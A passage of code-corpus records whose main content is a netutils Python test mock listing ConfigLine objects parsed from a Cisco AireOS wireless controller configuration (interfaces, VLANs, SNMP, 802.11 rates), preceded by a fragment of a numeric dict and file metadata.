0.9821428571429], 0.809948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.599170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.716517857143: [0.875, 0.125], 0.943558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.035395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.438456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.295599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.994897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.145089285714: [0.875, 0.125], 0.729591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.609375: [0.875, 0.125], 0.229591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.494897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.309948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.857142857143: [0.5, 0.0], 0.4375: [0.75, 0.25], 0.852040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.484375: [0.375, 0.625], 0.895089285714: [0.875, 0.125], 0.524234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.158163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.642857142857: [0.5, 0.0], 0.321109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.952806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.285714285714: [0.5, 0.0], 0.408163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.660395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.966517857143: [0.875, 0.125], 0.872448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.070153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.141581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.446109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.998724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.330357142857: [0.75, 0.25], 0.44387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.008928571429: [0.25, 0.75], 0.910395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.968112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.83131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.105867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.963010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.764987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.805803571429: [0.625, 0.375], 0.030612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.305803571429: [0.375, 0.625], 0.134885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.731823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.573660714286: [0.875, 0.125], 0.591517857143: [0.375, 0.625], 0.055803571429: [0.375, 0.625], 0.142857142857: [0.5, 0.0], 0.13137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.734375: [0.375, 0.625], 0.28443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.059948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.170599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.872130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.068558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.110969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.718112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.877232142857: [0.375, 0.625], 0.264987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.173469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.336415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.795599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.073660714286: [0.875, 0.125], 0.801020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.704081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.285395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.137755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.30325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.300701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.874681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.095663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.061224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.838966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.387755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.044642857143: [0.25, 0.75], 0.180803571429: [0.875, 0.125], 0.901785714286: [0.75, 0.25], 0.696109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.223214285714: [0.75, 0.25], 0.463010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.051020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.20631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.182397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.224170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.193558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.820153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.53443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.107142857143: [0.5, 0.0], 0.992028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.748724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.132653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.954081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.961415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.124681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.247130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.566326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.242028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.167091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.698660714286: [0.375, 0.625], 0.641581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.845663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.69387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.515306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.785714285714: [0.5, 0.0], 0.964285714286: [0.5, 0.0], 0.527742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.639987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.997130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.139987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.116071428571: [0.25, 0.75], 0.071428571429: [0.5, 0.0], 0.634885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.767538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.391581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.642538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.811224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.417091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.920599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.859375: [0.875, 0.125], 0.932397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.622448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.252232142857: [0.875, 0.125], 0.724170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.787946428571: [0.875, 0.125], 0.782844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.551020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.586734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.396683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.963966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.479272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.514987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.34693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.428571428571: [0.5, 0.0], 0.974170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.249681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.216517857143: [0.875, 0.125], 0.925701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.979591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.530612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.33131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.884885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.367028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.539540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.152742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.602040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.775510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.372130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.979272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.617028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.492028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.607142857143: [0.5, 0.0], 0.662946428571: [0.375, 0.625], 0.321428571429: [0.5, 0.0], 0.605867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.325255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.930803571429: [0.875, 0.125], 0.175701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.610969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.091517857143: [0.375, 0.625], 0.759885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.616071428571: [0.75, 0.25], 0.410395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.892538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.849170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.688456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.160395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.520089285714: [0.375, 0.625], 0.466517857143: [0.875, 0.125], 0.117028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.818558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.984375: [0.625, 0.375], 0.509885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.498724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.045599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.912946428571: [0.625, 0.375], 0.481823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.407844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.907844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.749681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.785395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.568558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.682397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.58131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.088966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.841517857143: [0.375, 0.625], 0.430803571429: [0.875, 0.125], 0.024234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.70631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.037946428571: [0.875, 0.125], 0.632653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.218112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.086734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.349170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.88137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.392538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.570153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.777742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.95631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.532844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.323660714286: [0.875, 0.125], 0.499681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.316326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.544642857143: [0.75, 0.25], 0.622130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.586415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.673469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.274234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.427295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.637755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.102040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.758928571429: [0.75, 0.25], 0.267538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.555803571429: [0.375, 0.625], 0.211415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.714285714286: [0.5, 0.0], 0.459183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.889987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.448660714286: [0.375, 0.625], 0.571109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.667091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.94387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.432397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.571428571429: [0.5, 0.0], 0.214285714286: [0.5, 0.0], 0.42825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.280612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.693558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.646683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.248724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.234375: [0.375, 0.625], 0.836415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.25: [0.5, 0.0], 0.959183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.003826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.668367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.517538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.301020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429]}
| 16,948
| 32,172
| 0.789946
| 10,676
| 84,740
| 6.26967
| 0.047302
| 0.003645
| 0.002734
| 0.003347
| 0.996967
| 0.995638
| 0.995638
| 0.995055
| 0.995055
| 0.992709
| 0
| 0.842233
| 0.062922
| 84,740
| 5
| 32,173
| 16,948
| 0.000693
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
f02d31b5bfcac9eeb6f97ce6e6b4392ab4562d97
| 49
|
py
|
Python
|
coupledmodeldriver/generate/__init__.py
|
WPringle/CoupledModelDriver
|
02fccc8be24c96f545d26d7c7efcacd5dfe8fbe7
|
[
"CC0-1.0"
] | 2
|
2021-05-12T18:01:07.000Z
|
2021-09-09T15:43:56.000Z
|
coupledmodeldriver/generate/__init__.py
|
WPringle/CoupledModelDriver
|
02fccc8be24c96f545d26d7c7efcacd5dfe8fbe7
|
[
"CC0-1.0"
] | 52
|
2021-01-26T21:59:13.000Z
|
2022-03-13T18:20:25.000Z
|
coupledmodeldriver/generate/__init__.py
|
WPringle/CoupledModelDriver
|
02fccc8be24c96f545d26d7c7efcacd5dfe8fbe7
|
[
"CC0-1.0"
] | 2
|
2021-03-30T14:42:39.000Z
|
2021-08-31T22:11:48.000Z
|
from coupledmodeldriver.generate.adcirc import *
| 24.5
| 48
| 0.857143
| 5
| 49
| 8.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.933333
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f06aeb0186bcfa78d220be55f526c48187f30da9
| 33,885
|
py
|
Python
|
tests/unit/mock/config/parser/cisco_aireos/aireos_full_received.py
|
vivekvashist/netutils
|
c2d75178d2613a44f070f55ef94e11866eef8f36
|
[
"Apache-2.0"
] | 91
|
2021-05-13T18:14:57.000Z
|
2022-03-22T14:36:38.000Z
|
tests/unit/mock/config/parser/cisco_aireos/aireos_full_received.py
|
vivekvashist/netutils
|
c2d75178d2613a44f070f55ef94e11866eef8f36
|
[
"Apache-2.0"
] | 61
|
2021-05-15T00:49:31.000Z
|
2022-03-28T06:08:52.000Z
|
tests/unit/mock/config/parser/cisco_aireos/aireos_full_received.py
|
vivekvashist/netutils
|
c2d75178d2613a44f070f55ef94e11866eef8f36
|
[
"Apache-2.0"
] | 26
|
2021-05-13T23:51:40.000Z
|
2022-03-31T12:30:11.000Z
|
from netutils.config.parser import ConfigLine
data = [
ConfigLine(config_line="config sysname POP-101-WLC", parents=()),
ConfigLine(config_line="config prompt POP-101-WLC", parents=()),
ConfigLine(config_line="config mobility group domain POP-101-MG", parents=()),
ConfigLine(config_line="config network rf-network-name POP-101-RF", parents=()),
ConfigLine(config_line="config mgmtuser add POP-101-ADMIN uZrt1E2ouhoZ read-write", parents=()),
ConfigLine(config_line="config mgmtuser telnet POP-101-ADMIN disable", parents=()),
ConfigLine(
config_line="config ap mgmtuser add username POP-101-ADMIN password uZrt1E2ouhoZ secret uZrt1E2ouhoZ all",
parents=(),
),
ConfigLine(config_line="config time ntp server 1 192.168.2.177", parents=()),
ConfigLine(config_line="config snmp version v1 disable", parents=()),
ConfigLine(config_line="config snmp version v2c disable", parents=()),
ConfigLine(config_line="config snmp community delete public", parents=()),
ConfigLine(config_line="config snmp community delete private", parents=()),
ConfigLine(config_line="config snmp version v3 disable", parents=()),
ConfigLine(config_line="config snmp v3user delete default", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd case-check disable", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd consecutive-check disable", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd username-check disable", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd lockout attempts mgmtuser 3", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd lockout time mgmtuser 5", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd default-check disable", parents=()),
ConfigLine(config_line="config network multicast global enable", parents=()),
ConfigLine(config_line="config network multicast igmp snooping enable", parents=()),
ConfigLine(config_line="config network multicast l2mcast disable service-port", parents=()),
ConfigLine(config_line="config network multicast l2mcast disable virtual", parents=()),
ConfigLine(config_line="config network multicast mld snooping enable", parents=()),
ConfigLine(config_line="config network multicast mode multicast 239.255.2.154", parents=()),
ConfigLine(config_line="config mdns snooping disable", parents=()),
ConfigLine(config_line="config lag enable", parents=()),
ConfigLine(config_line="config port adminmode 1 disable", parents=()),
ConfigLine(config_line="config port adminmode 2 disable", parents=()),
ConfigLine(config_line="config port adminmode 3 disable", parents=()),
ConfigLine(config_line="config port adminmode 4 disable", parents=()),
ConfigLine(config_line="config port adminmode 5 enable", parents=()),
ConfigLine(config_line="config switchconfig fips-prerequisite enable", parents=()),
ConfigLine(
config_line="config switchconfig fips-authorization-secret encrypt 1 df54cb494cddd573f74b80cf6436b6e5 c16b31809c669ad447cfa9269d5fd322026e8ace 16 27cc2f098c982310133d043d10579c63000000000000000000000000000000000000000000000000",
parents=(),
),
ConfigLine(config_line="config network webcolor red", parents=()),
ConfigLine(config_line="config network mgmt-via-wireless enable", parents=()),
ConfigLine(config_line="config network ap-priority enable", parents=()),
ConfigLine(config_line="config ap preferred-mode ipv4 all", parents=()),
ConfigLine(config_line="config ap tcp-adjust-mss enable all 1250", parents=()),
ConfigLine(config_line="config dhcp proxy disable bootp-broadcast disable", parents=()),
ConfigLine(config_line="config interface vlan management 40", parents=()),
ConfigLine(config_line="config interface port management 5", parents=()),
ConfigLine(
config_line="config interface address management 192.168.2.154 255.255.255.224 192.168.2.158", parents=()
),
ConfigLine(config_line="config interface dhcp management primary 192.168.2.158", parents=()),
ConfigLine(config_line="config interface dhcp management proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create data 10", parents=()),
ConfigLine(config_line="config interface vlan data 10", parents=()),
ConfigLine(config_line="config interface port data 5", parents=()),
ConfigLine(
config_line="config interface address dynamic-interface data 192.168.1.250 255.255.254.0 192.168.1.254",
parents=(),
),
ConfigLine(config_line="config interface dhcp dynamic-interface data primary 192.168.1.254", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface data proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create special 20", parents=()),
ConfigLine(config_line="config interface vlan special 20", parents=()),
ConfigLine(config_line="config interface port special 5", parents=()),
ConfigLine(
config_line="config interface address dynamic-interface special 192.168.2.58 255.255.255.192 192.168.2.62",
parents=(),
),
ConfigLine(config_line="config interface dhcp dynamic-interface special primary 192.168.2.62", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface special proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create voice 30", parents=()),
ConfigLine(config_line="config interface vlan voice 30", parents=()),
ConfigLine(config_line="config interface port voice 5", parents=()),
ConfigLine(
config_line="config interface address dynamic-interface voice 192.168.2.122 255.255.255.192 192.168.2.126",
parents=(),
),
ConfigLine(config_line="config interface dhcp dynamic-interface voice primary 192.168.2.126", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface voice proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create special 50", parents=()),
ConfigLine(config_line="config interface vlan special 50", parents=()),
ConfigLine(config_line="config interface port special 5", parents=()),
ConfigLine(config_line="config interface address dynamic-interface special 255.255.255.192", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface special primary", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface special proxy-mode disable", parents=()),
ConfigLine(config_line="config interface address virtual 192.0.2.1", parents=()),
ConfigLine(config_line="config country US", parents=()),
ConfigLine(config_line="config countries-list add US", parents=()),
ConfigLine(config_line="config 802.11b 11gsupport enable", parents=()),
ConfigLine(config_line="config 802.11b rate disabled 1", parents=()),
ConfigLine(config_line="config 802.11b rate disabled 2", parents=()),
ConfigLine(config_line="config 802.11b rate supported 5.5", parents=()),
ConfigLine(config_line="config 802.11b rate supported 6", parents=()),
ConfigLine(config_line="config 802.11b rate supported 9", parents=()),
ConfigLine(config_line="config 802.11b rate mandatory 11", parents=()),
ConfigLine(config_line="config 802.11b rate supported 12", parents=()),
ConfigLine(config_line="config 802.11b rate supported 18", parents=()),
ConfigLine(config_line="config 802.11b rate supported 24", parents=()),
ConfigLine(config_line="config 802.11b rate supported 36", parents=()),
ConfigLine(config_line="config 802.11b rate supported 48", parents=()),
ConfigLine(config_line="config 802.11b rate supported 54", parents=()),
ConfigLine(config_line="config advanced 802.11b edca-parameters optimized-video-voice", parents=()),
ConfigLine(config_line="config advanced 802.11b profile foreign global 10", parents=()),
ConfigLine(config_line="config advanced 802.11b profile clients global 12", parents=()),
ConfigLine(config_line="config advanced 802.11b profile noise global -70", parents=()),
ConfigLine(config_line="config advanced 802.11b profile utilization global 80", parents=()),
ConfigLine(config_line="config advanced 802.11b monitor channel-list all", parents=()),
ConfigLine(config_line="config advanced 802.11b monitor signal 180", parents=()),
ConfigLine(config_line="config advanced 802.11b monitor noise 180", parents=()),
ConfigLine(config_line="config 802.11b channel global auto", parents=()),
ConfigLine(config_line="config advanced 802.11b channel dca interval 1", parents=()),
ConfigLine(config_line="config advanced 802.11b channel foreign enable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel load disable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel noise enable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel device disable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel dca sensitivity medium", parents=()),
ConfigLine(config_line="config advanced 802.11b channel cleanair-event disable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel add 1", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 2", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 3", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 4", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 5", parents=()),
ConfigLine(config_line="config advanced 802.11b channel add 6", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 7", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 8", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 9", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 10", parents=()),
ConfigLine(config_line="config advanced 802.11b channel add 11", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 12", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 13", parents=()),
ConfigLine(config_line="config 802.11a rate mandatory 6", parents=()),
ConfigLine(config_line="config 802.11a rate supported 9", parents=()),
ConfigLine(config_line="config 802.11a rate mandatory 12", parents=()),
ConfigLine(config_line="config 802.11a rate supported 18", parents=()),
ConfigLine(config_line="config 802.11a rate mandatory 24", parents=()),
ConfigLine(config_line="config 802.11a rate supported 36", parents=()),
ConfigLine(config_line="config 802.11a rate supported 48", parents=()),
ConfigLine(config_line="config 802.11a rate supported 54", parents=()),
ConfigLine(config_line="config advanced 802.11a edca-parameters optimized-video-voice", parents=()),
ConfigLine(config_line="config 802.11a channel global auto", parents=()),
